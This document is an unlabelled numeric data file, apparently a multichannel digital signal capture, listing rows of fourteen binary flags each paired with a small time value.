0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5855200e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5855240e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.5855720e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5855960e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.5856200e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5856440e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5856520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5856680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5856960e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5857200e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5857480e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5857720e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5858000e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5858040e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.5858520e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5858760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5858840e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5859000e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5859240e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5859320e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.5859760e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5860000e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5860080e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5860280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5860520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5860760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5861000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5861240e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5861480e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5861560e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.5862040e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5862280e-03 0,0,1,1,1,1,0,0,0,0,0,0,0,0,1.5862320e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5862360e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5862520e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5862760e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5863000e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5863240e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5863480e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5863760e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5863800e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.5864280e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5864520e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5864600e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5864760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5865000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5865240e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5865480e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5865760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5866000e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5866040e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.5866280e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5866520e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5866600e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5866760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5867000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5867280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5867520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5867800e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5868040e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5868280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5868520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5868760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5869000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5869280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5869520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5869800e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5870040e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5870280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5870520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5870760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5871000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5871280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5871520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5871800e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5872040e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5872280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5872520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5872760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5873000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5873280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5873520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5873800e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5874040e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5874280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5874520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5874760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5875000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5875280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5875520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5875800e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5876040e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5876280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5876520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5876760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5877000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5877280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5877520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5877800e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5878040e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5878280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5878520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5878760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5879000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5879280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5879520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5879800e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5880040e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5880280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5880520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5880760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5881000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5881280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5881520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5881800e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5882040e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5882280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5882520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5882760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5883000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5883280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5883520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5883800e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5884040e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5884280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5884520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5884760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5885000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5885280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5885520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5885800e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5886040e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5886280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5886520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5886760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5887000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5887280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5887520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5887800e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5888040e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5888280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5888520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5888760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5889000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5889280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5889520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5889800e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5890040e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5890280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5890520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5890760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5891000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5891280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5891520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5891800e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5892040e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5892280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5892520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5892760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5893000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5893280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5893520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5893800e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5894040e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5894280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5894520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5894760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5895000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5895280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5895520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5895800e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5896040e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5896280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5896520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5896760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5897000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5897280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5897520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5897800e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5898040e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5898280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5898600e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5898840e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5899080e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5899320e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5899560e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.7144960e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.7147400e-03 1,0,1,1,1,0,0,0,0,0,0,1,0,1,1.7147720e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.7147960e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,1,1.7150760e-03 1,0,1,1,1,0,0,0,0,1,0,0,0,1,1.7151040e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,1,1.7151080e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,1,1.7151520e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,1,1.7151760e-03 1,0,1,1,1,1,0,0,0,0,0,0,0,1,1.7151800e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.7151840e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,1,1.7152000e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,1,1.7152280e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,1,1.7152760e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,1,1.7153000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,1,1.7153080e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,1,1.7153240e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7153320e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7153480e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7153560e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.7154040e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7154280e-03 1,0,1,1,1,1,0,0,0,0,0,0,0,0,1.7154320e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7154360e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7154520e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7154760e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7154800e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.7155240e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7155520e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7155560e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7155760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7156000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7156280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7156520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7156760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7157000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7157240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7157480e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7157560e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.7158040e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7158280e-03 1,0,1,1,1,1,0,0,0,0,0,0,0,0,1.7158320e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7158360e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7158520e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7158760e-03 1,0,1,1,1,0,0,0,0,1,0,0,0,0,1.7158800e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7158840e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.7159240e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7159480e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7159560e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7159760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7160000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7160280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7160520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7160760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7161000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7161240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7161480e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7161560e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.7162040e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7162280e-03 1,0,1,1,1,1,0,0,0,0,0,0,0,0,1.7162320e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7162360e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7162520e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7162760e-03 1,0,1,1,1,0,0,0,0,1,0,0,0,0,1.7162800e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7162840e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.7163240e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7163520e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7163560e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7163760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7164000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7164280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7164520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7164760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7165000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7165240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7165480e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7165560e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.7166040e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7166280e-03 1,0,1,1,1,1,0,0,0,0,0,0,0,0,1.7166320e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7166360e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7166520e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7166760e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7167000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7167240e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7167480e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7167760e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7168000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7168280e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7168520e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7168760e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7169000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7169240e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7169320e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.7169760e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7170000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7170080e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7170280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7170520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7170760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7171000e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7171080e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.7171520e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7171760e-03 1,0,1,1,1,1,0,0,0,0,0,0,0,0,1.7171800e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7171840e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7172040e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7172280e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7172520e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7172760e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7173000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7173240e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7173480e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7173760e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7174000e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7174280e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.7174760e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7175000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7175080e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7175240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7175480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7175760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7176000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7176280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7176520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7176760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7177000e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7177080e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.7177520e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7177760e-03 1,0,1,1,1,1,0,0,0,0,0,0,0,0,1.7177800e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7177840e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7178040e-03 1,0,1,1,1,0,0,0,0,1,0,0,0,0,1.7178280e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7178320e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.7178760e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7179000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7179080e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7179520e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7179760e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7180280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7180520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7181000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7181240e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7181320e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.7181760e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7182000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7182080e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7182520e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7182760e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7183000e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7183240e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7183480e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7183760e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7183800e-03 1,0,1,1,1,1,0,0,0,1,0,0,1,0,1.7184280e-03 1,0,1,1,1,1,0,0,0,1,0,0,0,0,1.7184520e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7184600e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7184760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7185000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7185240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7185480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7185760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7186000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7186280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7186520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7186760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7187000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7187240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7187480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7187760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7188000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7188280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7188520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7188760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7189000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7189240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7189480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7189760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7190000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7190280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7190520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7190760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7191000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7191240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7191480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7191760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7192000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7192280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7192520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7192760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7193000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7193240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7193480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7193760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7194000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7194280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7194520e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7194760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7195000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7195240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7195480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7195720e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7196000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7196280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7196480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7196760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7197000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7197240e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7197480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7197720e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7197960e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7198280e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7198480e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7198760e-03 1,0,1,1,1,0,0,0,0,0,0,0,0,0,1.7199000e-03 1,0,1,1,1,0,0,0,0,0,0,0,1,0,1.7199240e-03 